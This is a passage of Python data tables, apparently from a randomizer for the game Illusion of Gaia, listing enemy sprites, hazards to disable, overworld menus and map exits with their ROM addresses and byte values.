70: [8, b"\x55\x91\x8b", b"\x33", 2, True, True, "Archer 1"],
71: [8, b"\xfe\x8e\x8b", b"\x33", 2, True, False, "Archer Statue"],
72: [8, b"\xbe\x8d\x8b", b"\x34", 2, True, True, "Eyesore"],
73: [8, b"\x70\x8c\x8b", b"\x35", 3, False, True, "Fire Bug 1"],
74: [8, b"\x70\x8c\x8b", b"\x33", 3, False, False, "Fire Bug 2"],
75: [8, b"\x23\x94\x8b", b"\x32", 2, True, True, "Asp"],
76: [8, b"\x65\x91\x8b", b"\x33", 2, True, False, "Archer 2"],
77: [8, b"\x77\x91\x8b", b"\x33", 2, True, False, "Archer 3"],
78: [8, b"\x72\x8f\x8b", b"\x46", 2, True, False, "Archer Statue (switch) 1"],
79: [8, b"\x4f\x8f\x8b", b"\x33", 2, True, False, "Archer Statue (switch) 2"],
# Mt. Kress
80: [9, b"\xac\x9b\x8b", b"\x3e", 3, True, True, "Skulker (N/S)"],
81: [9, b"\x4e\x9c\x8b", b"\x3e", 3, True, True, "Skulker (E/W)"],
82: [9, b"\x44\x9c\x8b", b"\x3e", 3, True, False, "Skulker (E/W)"],
83: [9, b"\xa2\x9b\x8b", b"\x3e", 3, True, False, "Skulker (E/W)"],
84: [9, b"\x8b\x9e\x8b", b"\x3d", 3, False, True, "Yorrick (E/W)"],
85: [9, b"\x53\x9f\x8b", b"\x3d", 3, False, False, "Yorrick (E/W)"],
86: [9, b"\x0f\x9d\x8b", b"\x3d", 3, False, True, "Yorrick (N/S)"],
87: [9, b"\xcd\x9d\x8b", b"\x3d", 3, False, False, "Yorrick (N/S)"],
88: [9, b"\x3b\x98\x8b", b"\x3f", 3, False, True, "Fire Sprite"],
89: [9, b"\xcf\xa0\x8b", b"\x3c", 2, True, True, "Acid Splasher"],
90: [9, b"\xa1\xa0\x8b", b"\x3c", 2, True, False, "Acid Splasher (stationary E)"],
91: [9, b"\x75\xa0\x8b", b"\x3c", 2, True, False, "Acid Splasher (stationary W)"],
92: [9, b"\x49\xa0\x8b", b"\x3c", 2, True, False, "Acid Splasher (stationary S)"],
93: [9, b"\x1d\xa0\x8b", b"\x3c", 2, True, False, "Acid Splasher (stationary N)"],
# Ankor Wat
100: [10, b"\xd7\xb1\x8b", b"\x49", 2, True, True, "Shrubber"],
101: [10, b"\xb4\xb1\x8b", b"\x49", 2, True, False, "Shrubber 2"],
102: [10, b"\x75\xb2\x8b", b"\x46", 2, True, True, "Zombie"],
103: [10, b"\x4f\xaf\x8b", b"\x4a", 3, True, True, "Zip Fly"], # False for now...
104: [11, b"\x8d\xbd\x8b", b"\x42", 3, True, True, "Goldcap"],
105: [11, b"\x25\xb8\x8b", b"\x45", 2, True, True, "Gorgon"],
106: [11, b"\x17\xb8\x8b", b"\x45", 2, True, False, "Gorgon (jump down)"],
107: [11, b"\xbb\xbf\x8b", b"\x43", 2, True, False, "Frenzie"],
108: [11, b"\xd0\xbf\x8b", b"\x43", 2, True, True, "Frenzie 2"],
109: [11, b"\x66\xbb\x8b", b"\x44", 1, False, True, "Wall Walker"],
110: [11, b"\x66\xbb\x8b", b"\x3a", 1, False, False, "Wall Walker 2"],
111: [11, b"\x5c\xbb\x8b", b"\x44", 1, False, False, "Wall Walker 3"],
112: [11, b"\x5c\xbb\x8b", b"\x3a", 1, False, False, "Wall Walker 4"],
113: [11, b"\xaf\x99\x88", b"\x45", 2, True, False, "Gorgon (block)"],
# Pyramid
120: [12, b"\x5f\xc6\x8b", b"\x4f", 1, True, True, "Mystic Ball (stationary)"],
121: [12, b"\xfc\xc5\x8b", b"\x4f", 2, True, True, "Mystic Ball"],
122: [12, b"\xa3\xc5\x8b", b"\x4f", 2, True, True, "Mystic Ball"],
123: [12, b"\x9d\xc3\x8b", b"\x4e", 2, True, True, "Tuts"],
124: [12, b"\x98\xc7\x8b", b"\x51", 1, True, True, "Blaster"],
125: [12, b"\x84\xc1\x8b", b"\x4c", 2, True, False, "Haunt (stationary)"],
126: [12, b"\xa7\xc1\x8b", b"\x4c", 2, True, True, "Haunt"],
# Babel Tower
# 130: [14,b"\xd7\x99\x8a",b"\x5a","Castoth (boss)"],
# 131: [14,b"\xd5\xd0\x8a",b"\x5b","Viper (boss)"],
# 132: [14,b"\x50\xf1\x8a",b"\x5c","Vampire (boss)"],
# 133: [14,b"\x9c\xf1\x8a",b"\x5c","Vampire (boss)"],
# 134: [14,b"\x00\x80\x8b",b"\x5d","Sand Fanger (boss)"],
# 135: [14,b"\x1a\xa6\x8b",b"\x5e","Mummy Queen (boss)"],
# Jeweler's Mansion
140: [13, b"\xca\xaa\x8a", b"\x61", 2, True, True, "Flayzer"],
141: [13, b"\xf5\xaf\x8a", b"\x63", 1, True, True, "Grundit"],
142: [13, b"\xd8\xb0\x8a", b"\x62", 2, True, False, "Eye Stalker 1"],
143: [13, b"\x03\xb1\x8a", b"\x62", 2, True, True, "Eye Stalker 2"]
# Bosses
# 24: [15,b"\x03\x9b\x8a",b"\x14","Castoth (boss)"],
# 45: [15,b"\x6f\xd1\x8a",b"\x27","Viper (boss)"],
# 55: [15,b"\xf7\xf1\x8a",b"\x2f","Vampire (boss)"],
# 56: [15,b"\xc8\xf3\x8a",b"\x30","Vampire (boss)"],
# 79: [15,b"\x5c\x81\x8b",b"\x36","Sand Fanger (boss)"],
# 128: [15,b"\xb6\xa6\x8b",b"\x50","Mummy Queen (boss)"],
# 143: [15,b"\x09\xf7\x88",b"\x5f","Solid Arm (boss)"],
# 140: [15,b"\xaa\xee\x8c",b"\x54","Dark Gaia"]
}
# Database of non-enemy sprites to disable in enemizer
# FORMAT: { ID: [Enemyset, Event addr, Name]}
self.nonenemy_sprites = {
# Underground Tunnel
0: [0, "a8835", "Movable statue"],
1: [0, "a87ce", "Falling spear 1"],
2: [0, "a87c3", "Falling spear 2"],
3: [0, "a8aae", "Spike ball 1"],
4: [0, "a8a0f", "Spike ball 2"],
5: [0, "a8a7d", "Spike ball 3"],
6: [0, "a8a46", "Spike ball 4"],
7: [0, "a89de", "Spike ball 5"],
# Inca Ruins
10: [1, "9c26f", "Skeleton 1"],
11: [1, "9c798", "Skeleton 2"],
# 12: [1,"9c89d","Skeleton 3"], # Spriteset already restricted for this room
13: [1, "9c8f7", "Skeleton 4"],
14: [1, "a8896", "Broken statue (chest)"],
15: [1, "a88de", "Broken statue (blockade)"],
# Diamond Mine
20: [3, "5d6a8", "Elevator sign"],
21: [3, "aa4f5", "Elevator platform 1"],
22: [3, "aa50c", "Elevator platform 2"],
23: [3, "aa4e2", "Elevator platform 3"],
# Sky Garden
30: [4, "5f8c0", "Broken statue"],
31: [4, "ac0fe", "Sword statue 1"],
# 32: [4,"ac150","Sword statue 2"],
33: [4, "ac3b3", "Sword statue 3"],
# 34: [4,"ac409","Sword statue 4"],
35: [4, "accd4", "Fire snake (top)"],
36: [5, "accf1", "Fire snake (bottom)"],
# Mu
40: [6, "69ce9", "Floor spikes 1"],
41: [6, "69d1f", "Floor spikes 2"],
42: [6, "ae943", "Fire snake"],
# 43: [6,"69d4d","Donut"],
# Angel
50: [7, "6d56f", "Flame 1"],
51: [7, "6d57e", "Flame 2"],
52: [7, "6d58f", "Flame 3"],
# Great Wall
60: [8, "b8c30", "Wall spike 1"],
61: [8, "b8bf8", "Wall spike 2"],
62: [8, "7bd17", "Wall spike 3"],
63: [8, "7bd46", "Wall spike 4"],
64: [8, "7bd75", "Wall spike 5"],
65: [8, "7bce8", "Wall spike 5"],
# Mt Kress (nothing)
# Ankor Wat
80: [11, "89f2c", "Floating crystal"],
81: [11, "89ffc", "Skeleton 1"],
82: [11, "8a25e", "Skeleton 2"]
# Pyramid
# 90: [12,"8b6a2","Warp point"],
# 91: [12,"8cd6c","Warp point"],
# Jeweler's Mansion (nothing)
}
# Database of overworld menus
# FORMAT: { ID: [ShuffleID (0=no shuffle), Menu_ID, FromRegion, ToRegion, ROM_EntranceData, ROM_TextLoc, MenuText, ContinentName, AreaName]}
self.overworld_menus = {
# SW Continent "\x01"
1: [0, b"\x01", 10, 20, "3b95b", "0cafd", "3b590", "SW Continent", "South Cape"],
2: [0, b"\x01", 10, 30, "3b96b", "0cb26", "3b5a9", "SW Continent", "Edward's"],
3: [0, b"\x01", 10, 50, "3b97b", "0cb5b", "3b5b5", "SW Continent", "Itory"],
4: [0, b"\x01", 10, 60, "3b98b", "4f453", "3b5c2", "SW Continent", "Moon Tribe"],
5: [0, b"\x01", 10, 63, "3b99b", "0cb74", "3b59c", "SW Continent", "Inca"],
# SE Continent "\x07"
6: [0, b"\x07", 11, 102, "3b9ab", "5aab7", "3b5ef", "SE Continent", "Diamond Coast"],
7: [0, b"\x07", 11, 110, "3b9bb", "0cba3", "3b5e3", "SE Continent", "Freejia"],
8: [0, b"\x07", 11, 133, "3b9cb", "0cbbc", "3b608", "SE Continent", "Diamond Mine"],
9: [0, b"\x07", 11, 160, "3b9db", "5e31e", "3b615", "SE Continent", "Neil's"],
10: [0, b"\x07", 11, 162, "3b9eb", "5e812", "3b5fc", "SE Continent", "Nazca"],
# NE Continent "\x0a"
11: [0, b"\x0a", 12, 250, "3ba1b", "0cbeb", "3b642", "NE Continent", "Angel Village"],
12: [0, b"\x0a", 12, 280, "3ba2b", "0cc30", "3b636", "NE Continent", "Watermia"],
13: [0, b"\x0a", 12, 290, "3ba3b", "0cc49", "3b64f", "NE Continent", "Great Wall"],
# N Continent "\x0f"
14: [0, b"\x0f", 13, 310, "3ba4b", "0cc8e", "3b660", "N Continent", "Euro"],
15: [0, b"\x0f", 13, 330, "3ba5b", "0cca7", "3b66c", "N Continent", "Mt. Temple"],
16: [0, b"\x0f", 13, 350, "3ba6b", "0ccec", "3b679", "N Continent", "Native's Village"],
17: [0, b"\x0f", 13, 360, "3ba7b", "0cd05", "3b685", "N Continent", "Ankor Wat"],
# NW Continent Overworld "\x16"
18: [0, b"\x16", 14, 400, "3ba8b", "0cd24", "3b696", "NW Continent", "Dao"],
19: [0, b"\x16", 14, 410, "3ba9b", "0cd55", "3b6a3", "NW Continent", "Pyramid"]
}
# Database of special map exits that don't conform to the typical "02 26" format, IDs correspond to self.exits
# FORMAT: { ID: [MapAddr, Xaddr, Yaddr, FaceDirAddr, CameraAddr]}
self.exits_detailed = {
15: ["8ce31", "8ce37", "8ce40", "", "8ce49"] # Mummy Queen exit
}
# Database of map exits
# FORMAT: { ID: [CoupleID (0 if one-way), ShuffleTo (0 if no shuffle), ShuffleFrom (0 if no shuffle), FromRegion, ToRegion,
# ROM_Location, DestString,BossFlag, DungeonFlag, DungeonEntranceFlag, Name]}
self.exits = {
# Bosses
1: [ 2, 0, 0, 78, 97, "18872", b"\x29\x78\x00\xC0\x00\x00\x00\x11", True, True, False, "Castoth entrance (in)"],
2: [ 1, 0, 0, 0, 0, "189e4", b"\x1E\x68\x00\x00\x01\x03\x00\x24", True, True, False, "Castoth entrance (out)"],
3: [ 0, 0, 0, 104, 102, "584cc", b"\x30\x48\x00\x10\x01\x83\x00\x21", True, True, False, "Diamond Coast passage (Gold Ship)"],
4: [ 5, 0, 0, 171, 198, "18e20", b"\x55\x70\x00\xE0\x01\x00\x00\x22", True, True, False, "Viper entrance (in)"],
5: [ 4, 0, 0, 0, 0, "19006", b"\x4C\xF8\x00\x30\x00\x03\x00\x22", True, True, False, "Viper entrance (out)"],
6: [ 0, 0, 0, 198, 200, "acece", b"\x5A\x90\x00\x70\x00\x83\x00\x14", True, True, False, "Seaside Palace passage (Viper)"],
7: [ 8, 0, 0, 241, 243, "69c62", b"\x67\x78\x01\xd0\x01\x80\x01\x22", True, True, False, "Vampires entrance (in)"],
8: [ 7, 0, 0, 0, 0, "193f8", b"\x65\xb8\x00\x80\x02\x03\x00\x44", True, True, False, "Vampires entrance (out)"],
9: [ 0, 0, 0, 242, 212, "193ea", b"\x5f\x80\x00\x50\x00\x83\x00\x44", True, True, False, "Vampires exit"],
10: [11, 0, 0, 301, 302, "19c2a", b"\x8A\x50\x00\x90\x00\x87\x00\x33", True, True, False, "Sand Fanger entrance (in)"],
11: [10, 0, 0, 0, 0, "19c78", b"\x88\xE0\x03\x90\x00\x06\x00\x14", True, True, False, "Sand Fanger entrance (out)"],
12: [ 0, 0, 0, 303, 290, "19c84", b"\x82\x10\x00\x90\x00\x87\x00\x18", True, True, False, "Sand Fanger exit"],
13: [14, 0, 0, 414, 448, "8cdcf", b"\xDD\xF8\x00\xB0\x01\x00\x00\x22", True, True, False, "Mummy Queen entrance (in)"],
14: [13, 0, 0, 0, 0, "", b"\xCC\xF8\x01\x20\x01\x03\x00\x44", True, True, False, "Mummy Queen entrance (out)"], # fake
15: [ 0, 0, 0, 448, 415, "", b"\xCD\x70\x00\x90\x00\x83\x00\x11", True, True, False, "Mummy Queen exit"], # This one's dumb, see exits_detailed
16: [17, 0, 0, 470, 471, "1a8c2", b"\xE3\xD8\x00\x90\x03\x83\x30\x44", True, True, False, "Babel entrance (in)"],
17: [16, 0, 0, 0, 0, "1a8d0", b"\xE2\xD0\x00\xE0\x00\x03\x00\x84", True, True, False, "Babel entrance (out)"],
18: [ 0, 0, 0, 472, 400, "9804a", b"\xC3\x10\x02\x90\x00\x83\x00\x23", True, True, False, "Dao passage (Babel)"],
19: [20, 0, 0, 481, 482, "1a94e", b"\xEA\x78\x00\xC0\x00\x00\x00\x11", True, True, False, "Solid Arm entrance (in)"],
20: [19, 0, 0, 0, 0, "", b"\xE9\x78\x03\x90\x00\x03\x00\x44", True, True, False, "Solid Arm entrance (out)"], # fake
21: [ 0, 0, 0, 472, 400, "", b"\xC3\x10\x02\x90\x00\x83\x00\x23", True, True, False, "Dao passage (Solid Arm)"], # fake
# 21: [ 0, 0, 0, 482, 472, "", b"\xE3\x80\x02\xB0\x01\x80\x10\x23", True, True, False, "Babel passage (Solid Arm)"], # This one stays, @98115
# Passage Menus
22: [0, 0, 0, 15, 28, "", b"", False, False, False, "Seth: Passage 1 (South Cape)"],
23: [0, 0, 0, 15, 102, "", b"", False, False, False, "Seth: Passage 2 (Diamond Coast)"],
24: [0, 0, 0, 15, 280, "", b"", False, False, False, "Seth: Passage 3 (Watermia)"],
25: [0, 0, 0, 16, 60, "", b"", False, False, False, "Moon Tribe: Passage 1 (Moon Tribe)"],
26: [0, 0, 0, 16, 200, "", b"", False, False, False, "Moon Tribe: Passage 2 (Seaside Palace)"],
27: [0, 0, 0, 17, 161, "", b"", False, False, False, "Neil: Passage 1 (Neil's)"],
28: [0, 0, 0, 17, 314, "", b"", False, False, False, "Neil: Passage 2 (Euro)"],
29: [0, 0, 0, 17, 402, "", b"", False, False, False, "Neil: Passage 3 (Dao)"],
30: [0, 0, 0, 17, 460, "", b"", False, False, False, "Neil: Passage 4 (Babel)"],
# South Cape
31: [32, 0, 0, 20, 22, "18444", b"", False, False, False, "South Cape: School main (in)"], # Duplicate exit at 18438?
32: [31, 0, 0, 0, 0, "1856c", b"", False, False, False, "South Cape: School main (out)"],
33: [34, 0, 0, 21, 22, "18498", b"", False, False, False, "South Cape: School roof (in)"],
34: [33, 0, 0, 0, 0, "18560", b"", False, False, False, "South Cape: School roof (out)"],
35: [36, 0, 0, 20, 23, "18474", b"", False, False, False, "South Cape: Will's House (in)"],
36: [35, 0, 0, 0, 0, "1852a", b"", False, False, False, "South Cape: Will's House (out)"],
37: [38, 0, 0, 20, 24, "18480", b"", False, False, False, "South Cape: East House (in)"],
38: [37, 0, 0, 0, 0, "18552", b"", False, False, False, "South Cape: East House (out)"],
39: [40, 0, 0, 20, 27, "1845c", b"", False, False, False, "South Cape: Erik's House main (in)"],
40: [39, 0, 0, 0, 0, "184e8", b"", False, False, False, "South Cape: Erik's House main (out)"],
41: [42, 0, 0, 20, 27, "184a4", b"", False, False, False, "South Cape: Erik's House roof (in)"],
42: [41, 0, 0, 0, 0, "184f4", b"", False, False, False, "South Cape: Erik's House roof (out)"],
43: [44, 0, 0, 20, 26, "18450", b"", False, False, False, "South Cape: Lance's House (in)"],
44: [43, 0, 0, 0, 0, "184c0", b"", False, False, False, "South Cape: Lance's House (out)"],
45: [46, 0, 0, 20, 25, "18468", b"", False, False, False, "South Cape: Seth's House (in)"],
46: [45, 0, 0, 0, 0, "1851c", b"", False, False, False, "South Cape: Seth's House (out)"],
47: [48, 0, 0, 20, 28, "1848c", b"", False, False, False, "South Cape: Seaside Cave (in)"],
48: [47, 0, 0, 0, 0, "4be6a", b"", False, False, False, "South Cape: Seaside Cave (out)"],
# Edward's / Prison
50: [51, 0, 0, 31, 49, "1857c", b"", False, True, True, "Tunnel back entrance (in)"],
51: [50, 0, 0, 0, 0, "186f4", b"", False, True, True, "Tunnel back entrance (out)"],
52: [53, 0, 0, 33, 40, "1860c", b"\x0C\x58\x00\x50\x00\x83\x00\x12", False, True, True, "Tunnel entrance (in)"], # set checkpoint
53: [52, 0, 0, 0, 0, "18626", b"", False, True, True, "Tunnel entrance (out)"],
54: [ 0, 0, 0, 30, 32, "4c755", b"", False, False, False, "Prison entrance (king)"],
#55: [54, 0, 0, 0, 2, "", b"\x0a\xe0\x01\x60\x01\x03\x20\x34", False, False, False, "Prison exit (king), fake"],
# Tunnel
60: [61, 0, 0, 40, 41, "18632", b"", False, True, False, "Tunnel: Map 12 to Map 13"],
61: [60, 0, 0, 0, 0, "18640", b"", False, True, False, "Tunnel: Map 13 to Map 12"],
62: [63, 0, 0, 41, 42, "1864c", b"", False, True, False, "Tunnel: Map 13 to Map 14"],
63: [62, 0, 0, 0, 0, "1865a", b"", False, True, False, "Tunnel: Map 14 to Map 13"],
64: [65, 0, 0, 42, 43, "18666", b"", False, True, False, "Tunnel: Map 14 to Map 15"],
65: [64, 0, 0, 0, 0, "18680", b"", False, True, False, "Tunnel: Map 15 to Map 14"],
66: [67, 0, 0, 43, 44, "1868c", b"", False, True, False, "Tunnel: Map 15 to Map 16"],
67: [66, 0, 0, 0, 0, "1869a", b"", False, True, False, "Tunnel: Map 16 to Map 15"],
68: [69, 0, 0, 43, 45, "18674", b"", False, True, False, "Tunnel: Map 15 to Map 17"],
69: [68, 0, 0, 0, 0, "186a8", b"", False, True, False, "Tunnel: Map 17 to Map 15"],
70: [71, 0, 0, 46, 47, "186b4", b"", False, True, False, "Tunnel: Map 17 to Map 18"],
71: [70, 0, 0, 0, 0, "186c2", b"", False, True, False, "Tunnel: Map 18 to Map 17"],
72: [73, 0, 0, 48, 49, "186ce", b"", False, True, False, "Tunnel: Map 18 to Map 19"],
73: [72, 0, 0, 0, 0, "186e8", b"", False, True, False, "Tunnel: Map 19 to Map 18"],
# Itory
80: [81, 0, 0, 51, 53, "18704", b"", False, False, False, "Itory: West House (in)"],
81: [80, 0, 0, 0, 0, "1874e", b"", False, False, False, "Itory: West House (out)"],
82: [83, 0, 0, 51, 54, "18728", b"", False, False, False, "Itory: North House (in)"],
83: [82, 0, 0, 0, 0, "18776", b"", False, False, False, "Itory: North House (out)"],
84: [85, 0, 0, 51, 55, "18710", b"", False, False, False, "Itory: Lilly Front Door (in)"],
85: [84, 0, 0, 0, 0, "1875c", b"", False, False, False, "Itory: Lilly Front Door (out)"],
86: [87, 0, 0, 52, 55, "1871c", b"", False, False, False, "Itory: Lilly Back Door (in)"],
87: [86, 0, 0, 0, 0, "18768", b"", False, False, False, "Itory: Lilly Back Door (out)"],
88: [89, 0, 0, 51, 56, "18734", b"", False, False, False, "Itory Cave (in)"],
89: [88, 0, 0, 0, 0, "18784", b"", False, False, False, "Itory Cave (out)"],
90: [91, 0, 0, 57, 58, "18790", b"", False, False, False, "Itory Cave Hidden Room (in)"], # always linked?
91: [90, 0, 0, 0, 0, "1879c", b"", False, False, False, "Itory Cave Hidden Room (out)"],
# Moon Tribe
100: [101, 0, 0, 60, 61, "187b6", b"", False, False, False, "Moon Tribe Cave (in)"],
101: [100, 0, 0, 0, 0, "187c4", b"", False, False, False, "Moon Tribe Cave (out)"],
102: [ 0, 0, 0, 64, 170, "9d1ea", b"", False, True, True, "Moon Tribe: Sky Garden passage"],
# Inca
110: [111, 0, 0, 63, 70, "187d2", b"", False, True, True, "Inca Ruins entrance (in)"],
111: [110, 0, 0, 0, 0, "187e0", b"", False, True, True, "Inca Ruins entrance (out)"],
#114: [ 0, 0, 0, 65, 102, "", b"", False, False, True, "Inca: Diamond Coast passage"],
# Inca Ruins
120: [121, 0, 0, 70, 89, "", b"", False, True, False, "Inca: Map 29 to Map 37 (E)"],
121: [120, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 37 to Map 29 (E)"],
122: [123, 0, 0, 89, 94, "", b"", False, True, False, "Inca: Map 37 to Map 39"],
123: [122, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 39 to Map 37"],
124: [125, 0, 0, 94, 71, "", b"", False, True, False, "Inca: Map 39 to Map 29"],
125: [124, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 29 to Map 39"],
126: [127, 0, 0, 90, 72, "", b"", False, True, False, "Inca: Map 37 to Map 29 (W)"],
127: [126, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 29 to Map 37 (W)"],
128: [129, 0, 0, 72, 91, "", b"", False, True, False, "Inca: Map 29 to Map 38"],
129: [128, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 38 to Map 29"],
130: [131, 0, 0, 73, 80, "", b"", False, True, False, "Inca: Map 29 to Map 32"],
131: [130, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 32 to Map 29"],
132: [133, 0, 0, 81, 85, "", b"", False, True, False, "Inca: Map 32 to Map 35"],
133: [132, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 35 to Map 32"],
134: [135, 0, 0, 85, 74, "", b"", False, True, False, "Inca: Map 35 to Map 29"],
135: [134, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 35 to Map 29"],
136: [137, 0, 0, 74, 79, "", b"", False, True, False, "Inca: Map 29 to Map 31"],
137: [136, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 31 to Map 29"],
138: [139, 0, 0, 79, 95, "", b"", False, True, False, "Inca: Map 31 to Map 40"],
139: [138, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 40 to Map 31"],
140: [141, 0, 0, 96, 76, "", b"", False, True, False, "Inca: Map 40 to Map 29"],
141: [140, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 29 to Map 40"],
142: [143, 0, 0, 86, 82, "", b"", False, True, False, "Inca: Map 35 to Map 33"],
143: [142, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 33 to Map 35"],
144: [145, 0, 0, 83, 75, "", b"", False, True, False, "Inca: Map 33 to Map 29"],
145: [144, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 29 to Map 33"],
146: [147, 0, 0, 99, 84, "", b"", False, True, False, "Inca: Map 29 to Map 34"], # Special case to allow for Z-ladder glitch
147: [146, 0, 0, 84, 75, "", b"", False, True, False, "Inca: Map 34 to Map 29"],
148: [149, 0, 0, 84, 93, "", b"", False, True, False, "Inca: Map 34 to Map 38"],
149: [148, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 38 to Map 34"],
150: [151, 0, 0, 84, 87, "", b"", False, True, False, "Inca: Map 34 to Map 36"],
151: [150, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 36 to Map 34"],
152: [153, 0, 0, 88, 77, "", b"", False, True, False, "Inca: Map 36 to Map 30"],
153: [152, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 30 to Map 36"],
154: [ 0, 0, 0, 98, 100, "", b"", False, True, False, "Gold Ship entrance"],
# Gold Ship
160: [161, 0, 0, 100, 101, "", b"", False, False, False, "Gold Ship Interior (in)"],
161: [160, 0, 0, 0, 0, "", b"", False, False, False, "Gold Ship Interior (out)"],
# Diamond Coast
172: [173, 0, 0, 102, 103, "18aa0", b"", False, False, False, "Coast House (in)"],
173: [172, 0, 0, 0, 0, "18aae", b"", False, False, False, "Coast House (out)"],
# Freejia
182: [183, 0, 0, 110, 116, "18aec", b"", False, False, False, "Freejia: West House (in)"],
183: [182, 0, 0, 0, 0, "18b9c", b"", False, False, False, "Freejia: West House (out)"],
184: [185, 0, 0, 110, 117, "18af8", b"", False, False, False, "Freejia: 2-story House (in)"],
185: [184, 0, 0, 0, 0, "18bc4", b"", False, False, False, "Freejia: 2-story House (out)"],
186: [187, 0, 0, 111, 117, "18b04", b"", False, False, False, "Freejia: 2-story Roof (in)"],
187: [186, 0, 0, 0, 0, "18bd0", b"", False, False, False, "Freejia: 2-story Roof (out)"],
188: [189, 0, 0, 110, 118, "18b10", b"", False, False, False, "Freejia: Lovers' House (in)"],
189: [188, 0, 0, 0, 0, "18bf8", b"", False, False, False, "Freejia: Lovers' House (out)"],
190: [191, 0, 0, 110, 119, "18b1c", b"", False, False, False, "Freejia: Hotel (in)"],
191: [190, 0, 0, 0, 0, "18c20", b"", False, False, False, "Freejia: Hotel (out)"],
192: [193, 0, 0, 119, 120, "18c2c", b"", False, False, False, "Freejia: Hotel West Room (in)"],
193: [192, 0, 0, 0, 0, "18c44", b"", False, False, False, "Freejia: Hotel West Room (out)"],
194: [195, 0, 0, 119, 121, "18c38", b"", False, False, False, "Freejia: Hotel East Room (in)"],
195: [194, 0, 0, 0, 0, "18c50", b"", False, False, False, "Freejia: Hotel East Room (out)"],
196: [197, 0, 0, 110, 122, "18b28", b"", False, False, False, "Freejia: Laborer House (in)"], # might take this out?
197: [196, 0, 0, 0, 0, "18c84", b"", False, False, False, "Freejia: Laborer House (out)"],
198: [199, 0, 0, 112, 122, "18b34", b"", False, False, False, "Freejia: Laborer Roof (in)"],
199: [198, 0, 0, 0, 0, "18c78", b"", False, False, False, "Freejia: Laborer Roof (out)"],
200: [201, 0, 0, 110, 123, "18b40", b"", False, False, False, "Freejia: Messy House (in)"],
201: [200, 0, 0, 0, 0, "18c92", b"", False, False, False, "Freejia: Messy House (out)"],
202: [203, 0, 0, 110, 124, "18abc", b"", False, False, False, "Freejia: Erik House (in)"],
203: [202, 0, 0, 0, 0, "18b5a", b"", False, False, False, "Freejia: Erik House (out)"],
204: [205, 0, 0, 110, 125, "18ac8", b"", False, False, False, "Freejia: Dark Space House (in)"],
205: [204, 0, 0, 0, 0, "18b68", b"", False, False, False, "Freejia: Dark Space House (out)"],
206: [207, 0, 0, 110, 126, "18ad4", b"", False, False, False, "Freejia: Labor Trade House (in)"],
207: [206, 0, 0, 0, 0, "18b82", b"", False, False, False, "Freejia: Labor Trade House (out)"],
208: [209, 0, 0, 113, 126, "18ae0", b"", False, False, False, "Freejia: Labor Trade Roof (in)"],
209: [208, 0, 0, 0, 0, "18b8e", b"", False, False, False, "Freejia: Labor Trade Roof (out)"],
210: [211, 0, 0, 114, 127, "18b4c", b"", False, False, False, "Freejia: Labor Market (in)"],
211: [210, 0, 0, 0, 0, "18ca0", b"", False, False, False, "Freejia: Labor Market (out)"],
# Diamond Mine
222: [223, 0, 0, 133, 134, "", b"", False, True, False, "Diamond Mine: Map 62 to Map 63"],
223: [222, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 63 to Map 62"],
224: [225, 0, 0, 135, 140, "", b"", False, True, False, "Diamond Mine: Map 63 to Map 66"],
225: [224, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 66 to Map 63"],
226: [227, 0, 0, 134, 136, "", b"", False, True, False, "Diamond Mine: Map 63 to Map 64"],
227: [226, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 64 to Map 63"],
228: [229, 0, 0, 136, 138, "", b"", False, True, False, "Diamond Mine: Map 64 to Map 65"],
229: [228, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 65 to Map 64"],
230: [231, 0, 0, 139, 143, "", b"", False, True, False, "Diamond Mine: Map 65 to Map 66"],
231: [230, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 66 to Map 65"],
232: [233, 0, 0, 138, 130, "", b"", False, True, False, "Diamond Mine: Map 65 to Map 61"],
233: [232, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 61 to Map 65"],
234: [235, 0, 0, 132, 142, "", b"", False, True, False, "Diamond Mine: Map 61 to Map 66"],
235: [234, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 66 to Map 61"],
236: [237, 0, 0, 140, 144, "", b"", False, True, False, "Diamond Mine: Map 66 to Map 67 (1)"],
237: [236, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 67 to Map 66 (1)"],
238: [239, 0, 0, 145, 141, "", b"", False, True, False, "Diamond Mine: Map 67 to Map 66 (2)"],
239: [238, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 66 to Map 67 (2)"],
240: [241, 0, 0, 141, 146, "", b"", False, True, False, "Diamond Mine: Map 66 to Map 68"],
241: [240, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 68 to Map 66"],
242: [243, 0, 0, 146, 148, "", b"", False, True, False, "Diamond Mine: Map 68 to Map 69"],
243: [242, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 69 to Map 68"],
244: [245, 0, 0, 146, 149, "", b"", False, True, False, "Diamond Mine: Map 68 to Map 70"],
245: [244, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 70 to Map 68"],
246: [247, 0, 0, 147, 150, "", b"", False, True, False, "Diamond Mine: Map 68 to Map 71"],
247: [246, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 71 to Map 68"],
# Nazca
260: [261, 0, 0, 162, 170, "5e6a2", b"\x4C\x68\x01\x40\x00\x83\x00\x22", False, True, True, "Nazca: Sky Garden entrance"],
